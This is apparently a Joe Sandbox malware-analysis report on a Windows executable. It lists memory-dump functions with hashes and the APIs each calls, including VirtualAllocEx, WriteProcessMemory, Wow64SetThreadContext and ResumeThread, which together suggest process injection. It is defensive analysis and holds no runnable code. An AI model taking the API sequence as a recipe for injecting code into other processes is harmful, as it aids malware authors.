API String ID: 3559483778-0
Opcode ID: 4c38fbd1007a2b8cce6737a0bc8584eda3ab8ca9b51f17fe2abb710cad25dd3b
Instruction ID: 88e255491dae97b7e2a3e89be14191267fcd2b256d779257bcdbecce92a2c809
Opcode Fuzzy Hash: 4c38fbd1007a2b8cce6737a0bc8584eda3ab8ca9b51f17fe2abb710cad25dd3b
Instruction Fuzzy Hash: 012148B69002599FCB10CFA9C881BEEBBF1FF88324F10842EE959A7250C7749545CF64

Function 08EEB4E8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 08EEB578

Memory Dump Source

Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8e9e3478f44c6958d6e5ea2ebe15c6ea97e4f0f29c73c373adcbd38d9259ff28
Instruction ID: 44c5f2c2661d67623c68079ae6bd0bbb0972ce46295782196decf8d13c25ac24
Opcode Fuzzy Hash: 8e9e3478f44c6958d6e5ea2ebe15c6ea97e4f0f29c73c373adcbd38d9259ff28
Instruction Fuzzy Hash: 762128B19003599FCB10CFA9C885BDEBBF5FF48324F10842AE959A7250C7749554CBA5

Function 08EEB348 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08EEB3CE

Memory Dump Source

Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: f2d7d53db0a7672dac0e05de5942baa90f0285b6719bf130fe74974971f7df90
Instruction ID: 6eed3b52ae11d072d782c7692c4839f79f6f3af165485cf20017abc6b2e68448
Opcode Fuzzy Hash: f2d7d53db0a7672dac0e05de5942baa90f0285b6719bf130fe74974971f7df90
Instruction Fuzzy Hash: 60216AB19003098FDB10DFAAC4857EEBFF0AF88324F14842ED459A7241C7B89545CFA1

Function 08EEB5D0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 08EEB658

Memory Dump Source

Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 347ca1c78bb4625a0f0afcfff4567ff07acf8d93c8f5295f43a24aa42e121dad
Instruction ID: 953ad132cfd293c7b90786cf9ef8db35fbdf50a72e1557445475d527a1822827
Opcode Fuzzy Hash: 347ca1c78bb4625a0f0afcfff4567ff07acf8d93c8f5295f43a24aa42e121dad
Instruction Fuzzy Hash: 8D2139B18002599FCB10DFAAC841AEEBBF1FF48320F10852EE569A7250C7349544CBA4

Function 08EEB350 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08EEB3CE

Memory Dump Source

Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c35a68b91ad619972c00b0d68f6aada37f154086371e02fb316c026a82860e13
Instruction ID: 1bcc6649352db58e5bd095c2e9d6c8ccde17397946cbbfae7883d9e4661f4b80
Opcode Fuzzy Hash: c35a68b91ad619972c00b0d68f6aada37f154086371e02fb316c026a82860e13
Instruction Fuzzy Hash: BF2129B19003098FDB10DFAAC4857EEBBF4EF88324F14842ED459A7241D778A945CFA5

Function 08EEB5D8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 08EEB658

Memory Dump Source

Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: a6c6234763b62fe76ef29fb334fd7bb6cc6d2aa18a37a496c808d8541dac78d5
Instruction ID: 3ec12222b61c4d16013d5f29cdb03d6f9b53526d942f1f6d9507121d69e6839e
Opcode Fuzzy Hash: a6c6234763b62fe76ef29fb334fd7bb6cc6d2aa18a37a496c808d8541dac78d5
Instruction Fuzzy Hash: 072139B18003599FCB10DFAAC841BEEFBF5FF48320F10842AE558A7250C7349554CBA5

Function 08EEB420 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 08EEB496

Memory Dump Source

Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d9bbab45756a35b182459a851a62ae06d3cb602a260793327915fede9f46922b
Instruction ID: 4defa0b7ce83cbef32a49ab935a7a1431de78ef1a24f8b5d38f9b40ca98681ce
Opcode Fuzzy Hash: d9bbab45756a35b182459a851a62ae06d3cb602a260793327915fede9f46922b
Instruction Fuzzy Hash: E12159B28042499FCB10DFA9C844BEEBFF5EF89324F24881DE459A7250C7759554CFA1

Function 08EEB428 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 08EEB496

Memory Dump Source

Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b75b4a055e28f2cedf096409644c4cd82f177895ffd18016b016b6ea524a093c
Instruction ID: 2053b1301ced62e3c13cea961b4825d29f98e7f79748123e2db6700f352fe436
Opcode Fuzzy Hash: b75b4a055e28f2cedf096409644c4cd82f177895ffd18016b016b6ea524a093c
Instruction Fuzzy Hash: 201167B28002498FCB10DFAAC844BDEBFF5EF88320F108819E519A7250C735A540CFA0

Function 08EEB299 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 08EEB302

Memory Dump Source

Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 07d4382f4a8c9558694feaa3eec4b3645f39433d9a5ad7cefae622b0928071aa
Instruction ID: 94809d67684e5b1dbce423b1cd5804c59140515503470b3b2939c0bb3a016853
Opcode Fuzzy Hash: 07d4382f4a8c9558694feaa3eec4b3645f39433d9a5ad7cefae622b0928071aa
Instruction Fuzzy Hash: 961113B19002488FDB24DFAAC4457EEFFF5AF88324F24842ED459A7250CA75A944CFA5

Function 08EEB2A0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 08EEB302

Memory Dump Source

Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 6b2542e303dbb6e02d1c556499faba76a077da93ab88a5f9b66c38b38ae8b1b6
Instruction ID: db908d07a8c0aae97f60008fc847027854b46efd04a0d5e4a1ae11e41c0a4045
Opcode Fuzzy Hash: 6b2542e303dbb6e02d1c556499faba76a077da93ab88a5f9b66c38b38ae8b1b6
Instruction Fuzzy Hash: 621125B19002488FCB20DFAAC4457EEFBF4AF88324F20842AD459A7250CB75A944CBA5

Function 08EE9D58 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 08EEE65D

Memory Dump Source

Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 5d6a1ec1ff707fbf3f97d03192dfb4fd5a999bb3edec95be73c0846f4c8ebc56
Instruction ID: 01428c438b39780acb986feea34d4cce41c6f9694cfc97e773a3103336fd7f38
Opcode Fuzzy Hash: 5d6a1ec1ff707fbf3f97d03192dfb4fd5a999bb3edec95be73c0846f4c8ebc56
Instruction Fuzzy Hash: A71106B5800349DFCB10DF9AD445BDEBBF8EB48320F10841AE569B7210C375A954CFA5

Function 00C7E778 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00C7E7DE

Memory Dump Source

Source File: 00000000.00000002.1724151416.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_iNFGd6bDZX.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ce77e0e8b37003c8808d0d6fa541c0c12a45442ae6287dcb6284df4590127925
Instruction ID: 02fe2677acb873e42e8556b0293b350f845394c766aed479902f83730fb3fc6f
Opcode Fuzzy Hash: ce77e0e8b37003c8808d0d6fa541c0c12a45442ae6287dcb6284df4590127925
Instruction Fuzzy Hash: AD11E0B6C00249CFCB14CF9AD444ADEFBF9AF88324F10C46AD869A7210D375A545CFA5

Function 08EEE5F9 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 08EEE65D

Memory Dump Source

Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d6cd77b6b8ed95920dea3d5042d270c88c3fa75782f84ef8ef2c5baded013a33
Instruction ID: 561f9eb6d351c47d8e40f40a0770a180eefaf34e9958f21183dcf6cfddf2798a
Opcode Fuzzy Hash: d6cd77b6b8ed95920dea3d5042d270c88c3fa75782f84ef8ef2c5baded013a33
Instruction Fuzzy Hash: 1211F2B58002499FCB10CF9AD485BEEBFF4EB48320F14885AE469A7211C3B5A554CFA5

Function 00BDD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1723655346.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bdd000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af51c5ceb246c1781e289036adcd322530e5c9f1ce73002be39c2ff1238a4fc7
Instruction ID: ea82f403132636e690c0e3853eb02ded9b28cbd18de6e9fe6e06cb68332c7bf1
Opcode Fuzzy Hash: af51c5ceb246c1781e289036adcd322530e5c9f1ce73002be39c2ff1238a4fc7
Instruction Fuzzy Hash: 3D212571500204DFDB05DF14D9C0B2AFFA5FB98324F20C6AAE9494B356D336E856CAA2

Function 00BED01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1723709271.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bed000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95c1c8fe01435508362e276654f8e70cd4c00fc4764b774446ceb41f281d5224
Instruction ID: b7a09ac6b5dcb0f3567fbaa9a16fac67702bf0077cd66a8a86dbc9c0330cd85d
Opcode Fuzzy Hash: 95c1c8fe01435508362e276654f8e70cd4c00fc4764b774446ceb41f281d5224
Instruction Fuzzy Hash: 9D21F271604280DFCB14DF15D9D4B26BBA5FB84314F28C5ADD80A4B297C3BAD847CA61

Function 00BED006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1723709271.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bed000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6ccdebbb06e4b2bab58f9dad2a7c5fdb82631ab6f3d104d3b34998694fdad3e
Instruction ID: bf970bc0bc59c2620b5907c30b3c387694d7af79bbb3c5306e72521d5cf4a353
Opcode Fuzzy Hash: f6ccdebbb06e4b2bab58f9dad2a7c5fdb82631ab6f3d104d3b34998694fdad3e
Instruction Fuzzy Hash: A321A4755093C08FCB02CF20D594715BFB1EB45314F28C5EAD8498B297C33AD80ACB62

Function 00BDD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1723655346.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bdd000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 2bb0975c039676d4721197191ee6fb7359f2934b3dd43542566f9442111a43f1
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: E511CD72504240DFCB16CF00D5C4B16BFA1FB94324F24C2AAD8490A356C33AE85ACBA1

Non-executed Functions

Function 08EEAA78 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d1b1be991dc7e80ce7ead37a8b4abb71c79ec1bb11fa25d6490438eddc0d3d5
Instruction ID: abcd3f7db100e485b48396fa125a5fdf94c7eb18eef6710348cc804f25ef2770
Opcode Fuzzy Hash: 6d1b1be991dc7e80ce7ead37a8b4abb71c79ec1bb11fa25d6490438eddc0d3d5
Instruction Fuzzy Hash: D0E10A75E002298FCB14DFA9C5809AEFBF2FF89305F249169E415AB356D731A942CF60

Function 08EE8B60 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a786ebde58604f674398d12604cc22efa2dbc757500cbfbbec0e50c4caa7d447
Instruction ID: 3282a0e7032b0b4fb2ebc37ffbf2d62ff78d43144ae2b305688812778bdb9028
Opcode Fuzzy Hash: a786ebde58604f674398d12604cc22efa2dbc757500cbfbbec0e50c4caa7d447
Instruction Fuzzy Hash: 29E14A74E001298FCB14DFA9C5809AEFBB2FF89305F249269E405AB356D731AD42CF60

Function 08EE8F98 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8748d94ce072830eb64d9c70aa2d563b5f0bc058182df23ae2eb351a523b863
Instruction ID: eab05f48fb76ff1ae5348773d98b759c94fe2835a857dc56e996bec8a877caa2
Opcode Fuzzy Hash: d8748d94ce072830eb64d9c70aa2d563b5f0bc058182df23ae2eb351a523b863
Instruction Fuzzy Hash: 06E11875E002198FCB14DFA9C5809AEFBF2FF89305F249169E415AB356D731A942CFA0

Function 08EEA640 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c367164397ab1a874b81069a8841180bac1f049f9290bf825b679350474ae1de
Instruction ID: 6ba5b3f136c06d54b69aa5db90ff53c383f290401218e0b12c36d3cf5adeca1e
Opcode Fuzzy Hash: c367164397ab1a874b81069a8841180bac1f049f9290bf825b679350474ae1de
Instruction Fuzzy Hash: 5FE11974E002298FCB14DFA9D5809AEFBB2BF89305F249169E415AB356D731A942CF60

Function 08EE8728 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e630741f9e266e5c6807970178b117ca3c2c16a4f1a2bd46470b9d5058384ff
Instruction ID: f67eab19e89877c2f9694a04f9b8a8b5ad271077b5dd9782566d3030ec92d32d
Opcode Fuzzy Hash: 9e630741f9e266e5c6807970178b117ca3c2c16a4f1a2bd46470b9d5058384ff
Instruction Fuzzy Hash: 8AE11A75E001298FCB14DFA9C5809AEFBF2FF88305F249169E815AB356D731A942CF61

Function 00C72C50 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1724151416.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff609ca52d22626812d3d12736610bfbb2a7b142e92afbe4b0532d245b2c7ed7
Instruction ID: 8fce8587e6e1ae92f4ded64ed9a1fea46421bd291785dddaa67883143358d6aa
Opcode Fuzzy Hash: ff609ca52d22626812d3d12736610bfbb2a7b142e92afbe4b0532d245b2c7ed7
Instruction Fuzzy Hash: A8410632614245CFD725CBBDD841A2AB7F2EB94350B25C82AD06ADB764C334E941CF12

Function 00C72C60 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1724151416.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ac03eb2d519da2273bc77bc3908689dca4dfca0f78fc79819990438e715c51c
Instruction ID: 266fdb1ff074fadd2785733142edb1bec5e8675b84b2370a458b87f0ae6c7152
Opcode Fuzzy Hash: 6ac03eb2d519da2273bc77bc3908689dca4dfca0f78fc79819990438e715c51c
Instruction Fuzzy Hash: F841B632B14645CFD724CABED841A6AB7F6EB94350B24C826D06ADB764D334E941CF11

Function 00C737D0 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1724151416.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3407c467d155245cfb623483b46ca0b0804ada6d7a3f74abc56dc7d408808c5
Instruction ID: ad72ef4ae8bc9a7a34dfba013a622797042fad7aee7c115b7249c3c52d889071
Opcode Fuzzy Hash: e3407c467d155245cfb623483b46ca0b0804ada6d7a3f74abc56dc7d408808c5
Instruction Fuzzy Hash: 72310B71F1C295CFC7448F69C84556DBBB1EB88310F11C16BE50AEB391D734CA01AB92

Function 00C737E0 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1724151416.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2f99f2db1db09daac01739cba371fb89a638a37c9acf68f5da69acba3310ca5
Instruction ID: 3ac16b87472721ec88eb728cf6aab65c50a60e6403c16892f5deb5832150ff5d
Opcode Fuzzy Hash: d2f99f2db1db09daac01739cba371fb89a638a37c9acf68f5da69acba3310ca5
Instruction Fuzzy Hash: 4C31F871F18255CBCB448F5DC84556EBBB5EB88310F11C12BE90AEB391D734DE01AB96

Analysis Process: iNFGd6bDZX.exePID: 7568, Parent PID: 7352COMMON

Execution Graph

Execution Coverage:	11.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	203
Total number of Limit Nodes:	23

Executed Functions

Function 06EB3568 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06EB3C90
$^q, xrefs: 06EB3C73
$^q, xrefs: 06EB3C67
$^q, xrefs: 06EB3C9C
$^q, xrefs: 06EB3CC0
$^q, xrefs: 06EB3CB4

Memory Dump Source

Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 3e04b792aac03edb41a15e2ef2c4919ae7f2c396b89afb61b041ea9764e6cdd7
Instruction ID: 95e870700f37afec2bdceea798ef36102c14e80a69c90b8e814d860b93f56923
Opcode Fuzzy Hash: 3e04b792aac03edb41a15e2ef2c4919ae7f2c396b89afb61b041ea9764e6cdd7
Instruction Fuzzy Hash: D0322E31E1071A8FCB54DF75D8945ADB7B6FF89300F10D6AAD409AB224EB30AD85CB91

Function 06EB7E60 Relevance: 3.0, Strings: 2, Instructions: 479
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06EB81CF
$^q, xrefs: 06EB81C3

Memory Dump Source

Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: e405377fb01c4c5bc98be049c503388d01e8204ec78cfc5ad9699cfe29d84987
Instruction ID: f59bdcf95ff8abf045022ccd7a915f77a155ec4c51dd359ad5defb035cad553f
Opcode Fuzzy Hash: e405377fb01c4c5bc98be049c503388d01e8204ec78cfc5ad9699cfe29d84987
Instruction Fuzzy Hash: FF02CE30B002068FDB54DF68D9946AFB7EAFF88304F14A529D5069B390DB35EC86CB91

Function 06EB2728 Relevance: 1.1, Instructions: 1082COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4ebe36215a02f84a807cd38837c518c1c973c32a2a019d0aa135f7115691eba
Instruction ID: 20b83207ed86a86ff6ce6972aacf727df173de4f48bc87590f44b6198fd78c1f
Opcode Fuzzy Hash: a4ebe36215a02f84a807cd38837c518c1c973c32a2a019d0aa135f7115691eba
Instruction Fuzzy Hash: 3BA22434A003048FDB64CB68C584BAEBBF2EF49318F54A4A9D549AB361DB35ED85CF41

Function 06EB66D8 Relevance: .8, Instructions: 822COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd8ff5e39eff437641865c3f100c344464e6a0c6258088b3c254aca2d9198022
Instruction ID: c57d339378622fd780d5e89bcaf06d03d6984bdfeaaf7f780876a6f98d43a690
Opcode Fuzzy Hash: cd8ff5e39eff437641865c3f100c344464e6a0c6258088b3c254aca2d9198022
Instruction Fuzzy Hash: 8F629E34B002059FDB54DB68D994AAEB7F2EF88314F14A469D40AEB390DB35EC46CB91

Function 06EBC260 Relevance: .7, Instructions: 652COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a9da8f7ee7d28a6d98aa16f42bb249626e360615c6bda98b65a4c6b431c3db6
Instruction ID: 56dee1e8efecef3eadf7a385f0b5e01c58fbfebe1e4a7b3edab56f72ef55b5e1
Opcode Fuzzy Hash: 1a9da8f7ee7d28a6d98aa16f42bb249626e360615c6bda98b65a4c6b431c3db6
Instruction Fuzzy Hash: 6B32C030B002059FDF50DF68D984BAEB7B6EB88714F20A529D506EB354DB35EC42CB91

Function 06EB56A8 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aba0c9ec41e16a1db9ee7f58c3a40bc420787c372782883dfe02b0bee62a989
Instruction ID: bcaa80d09d3131e0ba605001626020a9e587c866d34ad20a62d5c5e684e9aa59
Opcode Fuzzy Hash: 2aba0c9ec41e16a1db9ee7f58c3a40bc420787c372782883dfe02b0bee62a989
Instruction Fuzzy Hash: D522F231F003159BDF64DFA4D8846AFB7A2EB85314F10A429D95AEB384DA34DC42CB91

Function 06EBB2FF Relevance: .6, Instructions: 572COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c68a4095a20d642e27002818547ba5fe7adc164aef9f4587d977003868d6d65
Instruction ID: dcb2e649f710ab348ad22dd854b5158679f27375ab76d8746fec1bf2bf6aa065
Opcode Fuzzy Hash: 7c68a4095a20d642e27002818547ba5fe7adc164aef9f4587d977003868d6d65
Instruction Fuzzy Hash: AE227030E102098FDF64DB68D9947EFB7A6EB49314F24A926E405DB391CE35DC81CB92

Function 06EBADA8 Relevance: 10.4, Strings: 8, Instructions: 393
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06EBAF4B
$^q, xrefs: 06EBAED5
$^q, xrefs: 06EBAF1C
$^q, xrefs: 06EBAF80
$^q, xrefs: 06EBAF57
$^q, xrefs: 06EBAEC9
$^q, xrefs: 06EBAF28
$^q, xrefs: 06EBAF74

Memory Dump Source

Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: e9d1b059e0abba8288b2e2f1f930f51757da8443d3437765c287ea2c7235186c
